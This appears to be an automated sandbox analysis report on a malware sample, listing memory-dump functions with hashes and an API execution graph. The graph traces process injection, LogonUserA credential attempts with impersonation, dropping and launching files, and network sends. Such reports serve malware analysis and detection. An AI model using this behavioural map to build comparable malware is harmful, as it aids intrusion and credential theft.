                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 7af7e9fdac3d99b683bd8c8a357d5a7c5c0ab88bc6b4b6353650ab31abac4f37
                  • Instruction ID: 62685f3664ab49f776e9a50186479f625fd9b143a20ea0c228a0b86a386e4215
                  • Opcode Fuzzy Hash: 7af7e9fdac3d99b683bd8c8a357d5a7c5c0ab88bc6b4b6353650ab31abac4f37
                  • Instruction Fuzzy Hash: 78018C75504600DFEB608F55DC84B66FBA0EF05724F08C0AADE468B661C3B5A458CBA2
                  Function 0069B8FA Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?), ref: 0069B92C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 56853efc1dbae55e26945dc19c70234c721926dbc3319b789c1405fc34d5b775
                  • Instruction ID: 08f854c0633452d1cb8f7c321bf537a90b1fa5de797f6fe1221095e1139bbca1
                  • Opcode Fuzzy Hash: 56853efc1dbae55e26945dc19c70234c721926dbc3319b789c1405fc34d5b775
                  • Instruction Fuzzy Hash: D101D6755046049FEB10CF15E9847A1FBE8DF05724F08C0AADE4A8BB51C374E804CEA2
                  Function 0069AC7A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0069ACB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 65b7af02b0e4ed6dc2f64213a831dc76a0f670469b8c34955be782ec3b76bb64
                  • Instruction ID: a6980ad0b95696bd2e929a1839f7e615d04a6e71cae8cb10b8de8dbf528be91d
                  • Opcode Fuzzy Hash: 65b7af02b0e4ed6dc2f64213a831dc76a0f670469b8c34955be782ec3b76bb64
                  • Instruction Fuzzy Hash: E9017C31404604EFEF218F85D844B61FBE5EF18724F08849ADE494BB62C376A858DFA2
                  Function 0069A23A Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNELBASE(?), ref: 0069A274
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: f4b24fb81ade7cd745ab498c3aaa536b9c11d7001c98eae5fa2bf3e2ddbe0bc0
                  • Instruction ID: 339c9578367add1ccd2099cf51714877af6bf2b51c00d98c4afb32f8db5a3d97
                  • Opcode Fuzzy Hash: f4b24fb81ade7cd745ab498c3aaa536b9c11d7001c98eae5fa2bf3e2ddbe0bc0
                  • Instruction Fuzzy Hash: 8101A2709042409FEB10CF55D984761FBE8EF45724F1CC09ADD058BB52D375E904CAA3
                  Function 0069A2FA Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                  Download Yara Rule
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 0069A32C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: aba5bf72bcd5b7d5c2d932fa7e852a66ab5e607b23ca4073608190ba8fb8c2c4
                  • Instruction ID: 16df1a580554c767530d7613e76b5d5aae0cfc82b81f5c10c80500a7847aebc3
                  • Opcode Fuzzy Hash: aba5bf72bcd5b7d5c2d932fa7e852a66ab5e607b23ca4073608190ba8fb8c2c4
                  • Instruction Fuzzy Hash: 8DF0AF748042449FEB10CF46D8847A1FBE4EF05724F08C0AADE498B752D379A804CEA3
                  Function 00AB0108 Relevance: .4, Instructions: 377COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82ab16afef51ad4c66280592b0f43cc5a8e6e64efd93fc8383dcbddff24ac7b2
                  • Instruction ID: 9d061d1ad43b05fbd9c81a6a9c1550c0bddb7c7029b3e2d38aeeef6de5a70d01
                  • Opcode Fuzzy Hash: 82ab16afef51ad4c66280592b0f43cc5a8e6e64efd93fc8383dcbddff24ac7b2
                  • Instruction Fuzzy Hash: B9E1F6747001109FDB189B38C468A7D7BE7AFCA609F1584BEE40ADB7A1CF7A9C058B51
                  Function 00AB0118 Relevance: .4, Instructions: 369COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1da0c4f11bb1e728d377dee17f1e1f162f067b823cd187efd2433370f9e1464e
                  • Instruction ID: c2aa5c8a6ef2a7fec8ef732d30ef336cbbea6db0689ecf5393c54d8fbcda2067
                  • Opcode Fuzzy Hash: 1da0c4f11bb1e728d377dee17f1e1f162f067b823cd187efd2433370f9e1464e
                  • Instruction Fuzzy Hash: 20D1E6747101009FDB189B38C468B7D7BE7AFCA609F1584BDA40ADB7A4CF7A9C068B51
                  Function 00AB0800 Relevance: .2, Instructions: 229COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7a78f7941c5b331b93460428e8f434fc0bde1444d8aa506afc9f8def321815c
                  • Instruction ID: 6227b422220fa72f48b04c5e43f78694cc11bf5556e37bd395f98489d14b41f8
                  • Opcode Fuzzy Hash: e7a78f7941c5b331b93460428e8f434fc0bde1444d8aa506afc9f8def321815c
                  • Instruction Fuzzy Hash: A78106316083958FCB12DB78C854AAA7BF1EF86218B1948BED456CB3A7DB34CC09C751
                  Function 00AB0790 Relevance: .1, Instructions: 79COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1dd488bb0ecfc32cd603b6578226de579177c96bcc11a01b319a716704097cd
                  • Instruction ID: 10e83a3e7dd9075a15b0738bc7b37e9aca21c93a693908e237d6a9f67e709e23
                  • Opcode Fuzzy Hash: d1dd488bb0ecfc32cd603b6578226de579177c96bcc11a01b319a716704097cd
                  • Instruction Fuzzy Hash: 4431C62060E7D05FDB179B745864BA67FB19F87204B0A44EFD885CF2A7C928481AC766
                  Function 00A2076C Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b21bdb49912dd0e9d4318fcf33ad153cefdae736cb82959877a251f49a1180dd
                  • Instruction ID: 1bac0cd70bcb4ca9a595d5212a76ccc77ec33d7a23e15a1db2bccf3cd00b586b
                  • Opcode Fuzzy Hash: b21bdb49912dd0e9d4318fcf33ad153cefdae736cb82959877a251f49a1180dd
                  • Instruction Fuzzy Hash: 2011E430248684EFD711CB14E980F26BBE1EB89708F24C5ACE9494B653C77BE803CA91
                  Function 00AB0014 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9913e45bacd32ea252a0d26d2ee89bbdbe20513c5d7c998f246bf43a03d746e6
                  • Instruction ID: 12dea9335fa108d8e6f838d12cde8107fc9d991ccea20e37fbf6eb2707964335
                  • Opcode Fuzzy Hash: 9913e45bacd32ea252a0d26d2ee89bbdbe20513c5d7c998f246bf43a03d746e6
                  • Instruction Fuzzy Hash: 6B01AE2140E3C04FDB13A73898B5659BFB0AE43100B1E88EBC4C2CF1ABEA184818D773
                  Function 00A2073C Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b9c0047b85b42d4a7c27b839de0b4dfd5acdd8cdb9ea3740a6d2ba272ae509e
                  • Instruction ID: c3ac41618cc9dffb0a7c8baccf76675b1e8199fa28501a8b1d2aaef8846b7290
                  • Opcode Fuzzy Hash: 5b9c0047b85b42d4a7c27b839de0b4dfd5acdd8cdb9ea3740a6d2ba272ae509e
                  • Instruction Fuzzy Hash: C3117C311497C09FC703CB14D940B11BFB1BF9A318F2986EAE4844B663C3369917DB51
                  Function 00A20710 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 39420ea1fd967b9376cbc235b7e64f1d6b2078db4f310013ec364228c3b2c226
                  • Instruction ID: 2bb092f4514062bb9e1e6f9f0ef5e9d4bbe46d25d7ba34fd7e2c09406f105ac9
                  • Opcode Fuzzy Hash: 39420ea1fd967b9376cbc235b7e64f1d6b2078db4f310013ec364228c3b2c226
                  • Instruction Fuzzy Hash: 9101843150D7C44FC303C724B854B21BFA09F93224F1D85EFC8898B693D65A591ADB93
                  Function 00A205E7 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ba82813baf71164df6644ded42da98e0ec7c6d89927c16d886866d3cb0a4b258
                  • Instruction ID: b71f284da2328eee423961d52bbb2b98ef8f687aa7c29bd68719db265cbb9cd8
                  • Opcode Fuzzy Hash: ba82813baf71164df6644ded42da98e0ec7c6d89927c16d886866d3cb0a4b258
                  • Instruction Fuzzy Hash: 38F0A9B650D3806FD7118B069C40862FFB8DF86620709C09FED4987652D125B908CB71
                  Function 00A2075F Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 423870d645d6d9db5c031f0f24dc02599d9ad664e9d9c650f46ebdfca623b427
                  • Instruction ID: 35553b2bd5057c32a8271ed08d21e69a939a913dd94861a75b935a88134ebd61
                  • Opcode Fuzzy Hash: 423870d645d6d9db5c031f0f24dc02599d9ad664e9d9c650f46ebdfca623b427
                  • Instruction Fuzzy Hash: D4118E34149684DFC712CB10D990B15BBB1EB8A708F28C6EED4494B6A3C33A9803CF41
                  Function 00AB0A40 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0a5f2a4653efe4eb4d600c72e8becf9b3cab2257fb7e480cefd60eda759c5484
                  • Instruction ID: 78584207c2a8ef4312c95d0a44e4f5893e0ca8107a563a33eaa39ae4142a794e
                  • Opcode Fuzzy Hash: 0a5f2a4653efe4eb4d600c72e8becf9b3cab2257fb7e480cefd60eda759c5484
                  • Instruction Fuzzy Hash: 77014070608202DFDB50FB7CD46802D7BE2FB84308B84892DA645C7259EE708C088B86
                  Function 00A20828 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bd28dbf71d4ee8e62a83ed0e350296e777db5385feaa077aad4f21ddb999f8f
                  • Instruction ID: 46cb43da30f2cce43fa9a012a1239059d13f79e3032aa5f5aa37cf8f1e23eb1a
                  • Opcode Fuzzy Hash: 0bd28dbf71d4ee8e62a83ed0e350296e777db5385feaa077aad4f21ddb999f8f
                  • Instruction Fuzzy Hash: 2AF0FB35148644DFC205CB44D980F16FBA2EB89718F24C6A9E94907652C737E812DE81
                  Function 00A205C0 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 302915d7a2c1907005535b8781bbc04639749dd893b448d7e524aaafa8a6c9e6
                  • Instruction ID: 9437e7808302774292e9988a18e51f15e61794164ce523534611f260fbd8b27b
                  • Opcode Fuzzy Hash: 302915d7a2c1907005535b8781bbc04639749dd893b448d7e524aaafa8a6c9e6
                  • Instruction Fuzzy Hash: EEE0EDB66046005BD740CF0BEC418A2F7E8EB84630B18C07BEC4E8B701D279B5088EA5
                  Function 00A205D0 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6aa3be85b8b3e4f2b7e0faf7a92d28c2f30d4aa5a63fe989c5b4f333377c5170
                  • Instruction ID: 2e28ad9ff66e8b0594e6424935c0ff49b5466e08902a145cf910bf85b282814e
                  • Opcode Fuzzy Hash: 6aa3be85b8b3e4f2b7e0faf7a92d28c2f30d4aa5a63fe989c5b4f333377c5170
                  • Instruction Fuzzy Hash: E8E068B56042100BEA608A0BBC004F6FB90EB9033071CC07BDD498A701D23AA21A8BC1
                  Function 00A20606 Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 199244b575eb0b2dbd3ca4aa67219147caddd69b3aef9b085f65d3e131d96b38
                  • Instruction ID: 03172d16089589b5cd72752eedeb2630551e1645303d2f2fb07e411adfda907a
                  • Opcode Fuzzy Hash: 199244b575eb0b2dbd3ca4aa67219147caddd69b3aef9b085f65d3e131d96b38
                  • Instruction Fuzzy Hash: 72E092B66046044B9650CF0BEC41462F7E8EB84630B08C07FDD4D8B711D679B509CEA5
                  Function 00AB0097 Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7657b2d57b17df3828eae2292ba9f024084f3c38cdd5fdc3f7c907b8819a891e
                  • Instruction ID: 9923c036a977f11cc7131350740c2451b0e6ba9e4aa4025391486a54205f2f90
                  • Opcode Fuzzy Hash: 7657b2d57b17df3828eae2292ba9f024084f3c38cdd5fdc3f7c907b8819a891e
                  • Instruction Fuzzy Hash: A2E08661B5D2900FCB05737C342159E7FE59E96114B1501AFD045C72E3C9590806C397
                  Function 00AB00A8 Relevance: .0, Instructions: 16COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23e4acfdb4098cf746bfab07351075f82d1e1ded094550ac031bef27419d213e
                  • Instruction ID: d8b599d2450a2cc7222fbe3fb9ded096c0de548aa6dcd1654dab8a3760f3369e
                  • Opcode Fuzzy Hash: 23e4acfdb4098cf746bfab07351075f82d1e1ded094550ac031bef27419d213e
                  • Instruction Fuzzy Hash: 3DD012317501240B890C77BCA015AAE3BDEDFC9654B0000BAE50DC7762CEAA5C0143D6
                  Function 006923F4 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590698487.0000000000692000.00000040.00000800.00020000.00000000.sdmp, Offset: 00692000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_692000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25f42c38214da16d98c6e3fd39cd64f0e43e46b90d26b9978f15033e6591572e
                  • Instruction ID: b810e3d394ecb9efd0bdd6cb1c28a458bfad70bd12752a7095f2d11e024e4bae
                  • Opcode Fuzzy Hash: 25f42c38214da16d98c6e3fd39cd64f0e43e46b90d26b9978f15033e6591572e
                  • Instruction Fuzzy Hash: DBD02E392096824FE7128F0CC1A4BC53BD8AB60B08F0B00F9A8008BB63C328D8C0C200
                  Function 006923BC Relevance: .0, Instructions: 14COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590698487.0000000000692000.00000040.00000800.00020000.00000000.sdmp, Offset: 00692000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_692000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 351584d08b5bc82fe4d01efbfd21c7b504a7ff4657043776c5f63092345b9918
                  • Instruction ID: 9afb706502f8892a0584cfa7e1ce938bc01aea2bbe5de6d5fd8fa5d5ca51cc90
                  • Opcode Fuzzy Hash: 351584d08b5bc82fe4d01efbfd21c7b504a7ff4657043776c5f63092345b9918
                  • Instruction Fuzzy Hash: 82D05E342052824BDB15DE0CC2E4F9933D9AB40714F0684E9AC108B762C7A8DCC0CA00

                  Execution Graph

                  Execution Coverage:29.2%
                  Dynamic/Decrypted Code Coverage:15.4%
                  Signature Coverage:11.5%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:29
                  execution_graph 12064 40c587 12065 40c596 12064->12065 12066 40c59a MultiByteToWideChar 12064->12066 12076 4018cf LocalAlloc 12066->12076 12068 40c5b7 MultiByteToWideChar StgOpenStorage 12071 40c660 12068->12071 12072 40c5eb 12068->12072 12069 4018b8 LocalFree 12070 40c67b 12069->12070 12071->12069 12072->12071 12077 4018cf LocalAlloc 12072->12077 12074 40c620 12075 4018b8 LocalFree 12074->12075 12075->12071 12076->12068 12077->12074 8758 40fe88 8759 410061 8758->8759 8762 40fe96 8758->8762 8762->8759 8763 40fed4 wsprintfA 8762->8763 8765 40ff51 GetTempPathA 8762->8765 8766 4018b8 LocalFree 8762->8766 8767 40ff75 GetTickCount wsprintfA CreateDirectoryA 8762->8767 8776 403d6d 8762->8776 8784 401788 8762->8784 8764 401e4c 6 API calls 8763->8764 8764->8762 8765->8762 8766->8762 8772 40ffa9 8767->8772 8768 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8768->8772 8769 401e4c 6 API calls 8769->8772 8771 40fffb lstrlen 8773 4026dd 19 API calls 8771->8773 8772->8768 8772->8769 8772->8771 8774 4018b8 LocalFree 8772->8774 8791 401463 ExitProcess 8772->8791 8775 410016 ShellExecuteA 8773->8775 8774->8762 8775->8772 8777 403d7a 8776->8777 8797 403bff 8777->8797 8780 403db2 8780->8762 8781 403bff 22 API calls 8782 403da9 8781->8782 8783 4018b8 LocalFree 8782->8783 8783->8780 8786 40179a 8784->8786 8785 4017c9 8785->8762 8786->8785 8787 4017a6 GlobalFix 8786->8787 8787->8785 8788 4017b5 8787->8788 8827 402497 8788->8827 8792 40148c 8791->8792 8793 4014df 8791->8793 8794 4014bc 8792->8794 8795 4014d7 CloseHandle 8792->8795 8796 401422 WriteFile 8792->8796 8793->8772 8794->8795 8795->8793 8796->8792 8824 4018cf LocalAlloc 8797->8824 8799 403c13 8825 4018cf LocalAlloc 8799->8825 8801 403c20 8826 4018cf LocalAlloc 8801->8826 8803 403c2d InternetCrackUrlA 8804 403c74 8803->8804 8805 403c7a 8803->8805 8804->8805 8806 403c7f InternetCreateUrlA 8804->8806 8808 4018b8 LocalFree 8805->8808 8806->8805 8807 403ca4 InternetCrackUrlA 8806->8807 8807->8805 8809 403ce5 8807->8809 8810 403d55 8808->8810 8809->8805 8811 403ced wsprintfA 8809->8811 8812 4018b8 LocalFree 8810->8812 8814 403800 5 API calls 8811->8814 8813 403d5d 8812->8813 8815 4018b8 LocalFree 8813->8815 8816 403d12 8814->8816 8817 403d65 8815->8817 8816->8805 8818 403d18 lstrlen 8816->8818 8817->8780 8817->8781 8819 403884 send 8818->8819 8820 403d2f 8819->8820 8822 403a78 10 API calls 8820->8822 8823 403d33 closesocket 8820->8823 8822->8823 8823->8805 8824->8799 8825->8801 8826->8803 8832 4018cf LocalAlloc 8827->8832 8829 4024ab 8830 4018b8 LocalFree 8829->8830 8831 4017c1 GlobalUnWire 8830->8831 8831->8785 8832->8829 8526 4105d6 SetUnhandledExceptionFilter 8527 4105e0 8526->8527 8538 40fa90 8527->8538 8529 4105e5 8530 410601 RevertToSelf 8529->8530 8531 410607 8529->8531 8530->8531 8543 410223 8531->8543 8533 410616 8549 41032d 8533->8549 8535 41061b 8565 410065 8535->8565 8537 410620 8539 40faa3 8538->8539 8540 40faa4 8538->8540 8539->8529 8541 40fae9 8540->8541 8542 40fabf GetTickCount 8540->8542 8541->8529 8542->8540 8544 410236 8543->8544 8547 410237 8543->8547 8544->8533 8545 41024a 8545->8533 8546 402aaa LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 8546->8547 8547->8545 8547->8546 8596 4018cf LocalAlloc 8547->8596 8550 410341 8549->8550 8558 410342 8549->8558 8550->8535 8551 410355 8551->8535 8552 410374 lstrcmpiA 8553 41038b LogonUserA 8552->8553 8552->8558 8553->8558 8554 41043a 741D1B10 8554->8558 8556 4103b9 lstrlen LCMapStringA 8556->8558 8559 4103df LogonUserA 8556->8559 8557 41049f ImpersonateLoggedOnUser 8557->8558 8558->8551 8558->8552 8558->8553 8558->8554 8558->8557 8560 4018b8 LocalFree 8558->8560 8561 4104c0 8558->8561 8562 4104db CloseHandle 8558->8562 8563 410417 LogonUserA 8558->8563 8564 4104ba RevertToSelf 8558->8564 8597 402a1d lstrlen 8558->8597 8559->8558 8560->8558 8561->8558 8561->8562 8562->8558 8563->8554 8563->8558 8564->8561 8566 410077 8565->8566 8567 410078 8565->8567 8566->8537 8601 4018cf LocalAlloc 8567->8601 8569 410088 GetTickCount wsprintfA 8602 4018cf LocalAlloc 8569->8602 8571 4100b2 8603 4018cf LocalAlloc 8571->8603 8573 4100ca 8604 4018cf LocalAlloc 8573->8604 8575 4100dd GetModuleFileNameA GetTempPathA 8576 41012f ExitProcess 8575->8576 8577 41011f lstrcat 8575->8577 8577->8576 8596->8547 8600 4018cf LocalAlloc 8597->8600 8599 402a2f lstrcpy 8599->8556 8600->8599 8601->8569 8602->8571 8603->8573 8604->8575 8833 402bda 8834 402be4 8833->8834 8836 402bfc 8834->8836 8837 402968 8834->8837 8838 402978 8837->8838 8839 40298a 8837->8839 8838->8839 8840 402991 LookupPrivilegeValueA 8838->8840 8839->8834 8841 402a07 8840->8841 8842 4029ad GetCurrentProcess OpenProcessToken 8840->8842 8845 402a16 8841->8845 8846 402a0e CloseHandle 8841->8846 8843 4029c5 8842->8843 8844 4029ee AdjustTokenPrivileges 8842->8844 8843->8844 8844->8841 8845->8834 8846->8845 11722 41051e OleInitialize 11740 402530 11722->11740 11725 40fa90 GetTickCount 11726 41052d 11725->11726 11757 402c01 11726->11757 11728 410537 11729 41053b 11728->11729 11730 41054e 11728->11730 11741 4024d6 2 API calls 11740->11741 11742 40253f 11741->11742 11743 4024d6 2 API calls 11742->11743 11744 40254e 11743->11744 11745 4024d6 2 API calls 11744->11745 11746 40255d 11745->11746 11747 4024d6 2 API calls 11746->11747 11748 40256c 11747->11748 11749 4024d6 2 API calls 11748->11749 11750 40257b 11749->11750 11751 4024d6 2 API calls 11750->11751 11752 40258a 11751->11752 11753 4024d6 2 API calls 11752->11753 11754 402599 11753->11754 11755 4024d6 2 API calls 11754->11755 11756 4025a8 11755->11756 11756->11725 11758 402c14 11757->11758 11759 402c15 11757->11759 11758->11728 11760 402c31 11759->11760 11761 402c36 GetCurrentProcess OpenProcessToken 11759->11761 11760->11728 11762 402ce2 11761->11762 11763 402c52 GetTokenInformation 11761->11763 11762->11728 8435 41a1e0 8436 41a1f0 8435->8436 8437 41a326 VirtualProtect VirtualProtect 8436->8437 8438 41a2ea LoadLibraryA 8436->8438 8440 41a35a 8437->8440 8439 41a301 8438->8439 8439->8436 8441 41a308 GetProcAddress 8439->8441 8440->8440 8441->8439 8442 41a320 ExitProcess 8441->8442 8448 40fc62 8450 40fc6a 8448->8450 8449 40fc7e 8450->8449 8466 4017d5 8450->8466 8452 40fc96 8452->8449 8480 401675 8452->8480 8454 40fca4 8454->8449 8486 4016db 8454->8486 8456 40fcb2 8456->8449 8493 401a27 8456->8493 8458 40fcc5 8458->8449 8459 401675 2 API calls 8458->8459 8460 40fcd3 8459->8460 8460->8449 8461 4016db 2 API calls 8460->8461 8462 40fce1 8461->8462 8462->8449 8463 40fce7 8462->8463 8503 401aec GetTickCount 8463->8503 8468 4017ea 8466->8468 8467 4018a9 8467->8452 8468->8467 8469 4017fa GlobalFix 8468->8469 8469->8467 8470 40180d 8469->8470 8513 4018cf LocalAlloc 8470->8513 8472 401826 8514 4018cf LocalAlloc 8472->8514 8474 40183f 8475 401855 GlobalUnWire 8474->8475 8476 40186b 8475->8476 8515 4018b8 8476->8515 8479 4018b8 LocalFree 8479->8467 8481 40168e 8480->8481 8482 40169a GlobalFix 8481->8482 8484 4016bf 8481->8484 8483 4016a9 8482->8483 8482->8484 8485 4016b4 GlobalUnWire 8483->8485 8484->8454 8485->8484 8487 4016f4 8486->8487 